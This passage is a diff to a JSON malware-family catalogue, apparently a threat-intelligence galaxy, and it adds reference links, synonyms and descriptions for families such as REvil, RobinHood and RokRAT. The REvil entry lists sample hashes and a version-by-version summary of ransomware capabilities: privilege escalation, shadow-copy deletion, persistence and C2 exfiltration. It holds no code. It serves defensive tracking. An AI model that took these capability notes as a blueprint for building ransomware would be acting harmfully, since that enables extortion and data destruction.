"https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/", + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4dc538e-09b7-4dba-99b0-e8b8b70dd42a", + "value": "Retro" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" + "https://securelist.com/revengehotels/95229/", + "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://blogs.360.cn/post/APT-C-44.html", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], "synonyms": [ "Revetrat" @@ -14416,12 +26433,137 @@ "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", "value": "Revenge RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton", + "https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48c10822-9af8-4324-9516-b33ecf975590", + "value": "Reveton Ransomware" + }, + { + "description": "REvil Beta\r\nMD5: bed6fc04aeb785815744706239a1f243\r\nSHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf\r\nSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45\r\n* Privilege escalation via CVE-2018-8453 (64-bit only)\r\n* Rerun with RunAs to elevate privileges\r\n* Implements a requirement that if \"exp\" is set, privilege escalation must be successful for full execution to occur\r\n* Implements target whitelisting using GetKetboardLayoutList\r\n* Contains debug console logging functionality\r\n* Defines the REvil registry root key as SOFTWARE\\!test\r\n* Includes two variable placeholders in the ransom note: UID & KEY\r\n* Terminates processes specified in the \"prc\" configuration key prior to encryption\r\n* Deletes shadow copies and disables recovery\r\n* Wipes contents of folders specified in the \"wfld\" configuration key prior to encryption\r\n* Encrypts all non-whitelisted files on fixed drives\r\n* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe\r\n* Partially implements a background image setting to display a basic \"Image text\" message\r\n* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)\r\n------------------------------------\r\nREvil 1.00\r\nMD5: 65aa793c000762174b2f86077bdafaea\r\nSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457\r\nSHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc\r\n* Adds 32-bit implementation of CVE-2018-8453 exploit\r\n* Removes console debug logging\r\n* Changes the REvil registry root key to SOFTWARE\\recfg\r\n* Removes the System/Impersonation success requirement for encrypting network mapped drives\r\n* Adds a \"wipe\" key to the configuration for optional folder wiping\r\n* Fully implements the background image setting and leverages values defined in the \"img\" configuration key\r\n* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT\r\n* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL\r\n* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data\r\n------------------------------------\r\nREvil 1.01\r\nMD5: 2abff29b4d87f30f011874b6e98959e9\r\nSHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c\r\nSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb\r\n* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level\r\n* Makes encryption of network mapped drives optional by adding the \"-nolan\" argument\r\n------------------------------------\r\nREvil 1.02\r\nMD5: 4af953b20f3a1f165e7cf31d6156c035\r\nSHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299\r\nSHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4\r\n* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage\r\n* Partially implements \"lock file\" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)\r\n* Enhances folder whitelisting logic that take special considerations if the folder is associated with \"program files\" directories\r\n* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories\r\n* Hard-codes whitelisting of \"sql\" subfolders within program files\r\n* Encrypts program files sub-folders that does not contain \"sql\" in the path\r\n* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted\r\n* Encodes stored strings used for URI building within the binary and decodes them in memory right before use\r\n* Introduces a REvil registry root key \"sub_key\" registry value containing the attacker's public key\r\n------------------------------------\r\nREvil 1.03\r\nMD5: 3cae02306a95564b1fff4ea45a7dfc00\r\nSHA1: 0ce2cae5287a64138d273007b34933362901783d\r\nSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf\r\n* Removes lock file logic that was partially implemented in 1.02\r\n* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)\r\n* Encodes stored shellcode\r\n* Adds the -path argument:\r\n* Does not wipe folders (even if wipe == true)\r\n* Does not set desktop background\r\n* Does not contact the C2 server (even if net == true)\r\n* Encrypts files in the specified folder and drops the ransom note\r\n* Changes the REvil registry root key to SOFTWARE\\QtProject\\OrganizationDefaults\r\n* Changes registry key values from --> to:\r\n * sub_key --> pvg\r\n * pk_key --> sxsP\r\n * sk_key --> BDDC8\r\n * 0_key --> f7gVD7\r\n * rnd_ext --> Xu7Nnkd\r\n * stat --> sMMnxpgk\r\n------------------------------------\r\nREvil 1.04\r\nMD5: 6e3efb83299d800edf1624ecbc0665e7\r\nSHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d\r\nSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6\r\n* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)\r\n* Removes the folder wipe capability\r\n* Changes the REvil registry root key to SOFTWARE\\GitForWindows\r\n* Changes registry key values from --> to:\r\n * pvg --> QPM\r\n * sxsP --> cMtS\r\n * BDDC8 --> WGg7j\r\n * f7gVD7 --> zbhs8h\r\n * Xu7Nnkd --> H85TP10\r\n * sMMnxpgk --> GCZg2PXD\r\n------------------------------------\r\nREvil v1.05\r\nMD5: cfefcc2edc5c54c74b76e7d1d29e69b2\r\nSHA1: 7423c57db390def08154b77e2b5e043d92d320c7\r\nSHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea\r\n* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.\r\n* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :\r\n * SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lNOWZyAWVv\r\n* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.\r\n* Changes registry key values from --> to:\r\n * QPM --> tgE\r\n * cMtS --> 8K09\r\n * WGg7j --> xMtNc\r\n * zbhs8h --> CTgE4a\r\n * H85TP10 --> oE5bZg0\r\n * GCZg2PXD --> DC408Qp4\r\n------------------------------------\r\nREvil v1.06\r\nMD5: 65ff37973426c09b9ff95f354e62959e\r\nSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e\r\nSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e\r\n* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.\r\n* Modified handling of network file encryption. Now explicitly passes every possible \"Scope\" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type\" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.\r\n* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'\r\n* Changes registry key values from --> to:\r\n * tgE --> 73g\r\n * 8K09 --> vTGj\r\n * xMtNc --> Q7PZe\r\n * CTgE4a --> BuCrIp\r\n * oE5bZg0 --> lcZd7OY\r\n * DC408Qp4 --> sLF86MWC\r\n------------------------------------\r\nREvil v1.07\r\nMD5: ea4cae3d6d8150215a4d90593a4c30f2\r\nSHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e\r\nSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3\r\nTBD", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", + "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", + "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", + "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", + "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://asec.ahnlab.com/ko/19860/", + "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", + "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.certego.net/en/news/malware-tales-sodinokibi/", + "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "https://hatching.io/blog/ransomware-part2", + "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", + "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", + "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", + "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", + "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", + "https://community.riskiq.com/article/3315064b", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", + "https://blog.amossys.fr/sodinokibi-malware-analysis.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://isc.sans.edu/diary/27012", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://securelist.com/sodin-ransomware/91473/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.kpn.com/security-blogs/Tracking-REvil.htm", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", + "https://vimeo.com/449849549", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://www.grahamcluley.com/travelex-paid-ransom/", + "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", + "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://asec.ahnlab.com/ko/19640/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos" + ], + "synonyms": [ + "Sodin", + "Sodinokibi" + ], + "type": [] + }, + "uuid": "e7698597-e0a9-4f4b-9920-09f5db225bd4", + "value": "REvil" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], @@ -14430,11 +26572,39 @@ "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino", + "https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cff6ec82-9d14-4307-9b5b-c0bd17e62f2a", + "value": "Rhino Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f1bac43-6506-43f0-b5d6-709a39abd671", + "value": "RHttpCtrl" + }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/", + "https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/", "https://blog.avast.com/rietspoof-malware-increases-activity" ], "synonyms": [], @@ -14448,7 +26618,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", - "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" ], "synonyms": [], "type": [] @@ -14487,7 +26659,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf" ], "synonyms": [], "type": [] @@ -14501,7 +26674,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] @@ -14514,9 +26688,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", - "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", + "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/" ], "synonyms": [ + "Gussdoor", "Remote Manipulator System" ], "type": [] @@ -14528,8 +26707,35 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", - "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/", + "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", + "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", + "https://goggleheadedhacker.com/blog/post/12", + "https://twitter.com/VK_Intel/status/1121440931759128576", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + ], + "synonyms": [ + "RobbinHood" + ], + "type": [] + }, + "uuid": "6f3469f6-7a56-4ba3-a340-f10746390226", + "value": "RobinHood" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock" ], "synonyms": [ "yellowalbatross" @@ -14544,7 +26750,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] @@ -14569,6 +26776,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" ], @@ -14582,7 +26791,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/" ], "synonyms": [], "type": [] @@ -14591,21 +26801,34 @@ "value": "Rokku" }, { - "description": "", + "description": "It is a backdoor commonly distributed as an encoded\r\nbinary file downloaded and decrypted by shellcode following the\r\nexploitation of weaponized documents. DOGCALL is capable of\r\ncapturing screenshots, logging keystrokes, evading analysis with\r\nanti-virtual machine detections, and leveraging cloud storage APIs\r\nsuch as Cloud, Box, Dropbox, and Yandex.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", + "https://www.ibm.com/downloads/cas/Z81AVOY7", "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.youtube.com/watch?v=uoBQE5s2ba4", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "http://v3lo.tistory.com/24", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + ], + "synonyms": [ + "DOGCALL" ], - "synonyms": [], "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", @@ -14685,7 +26908,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", - "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/", + "https://securelist.com/apt-trends-report-q3-2020/99204/" ], "synonyms": [], "type": [] @@ -14701,12 +26925,13 @@ "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", + "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", 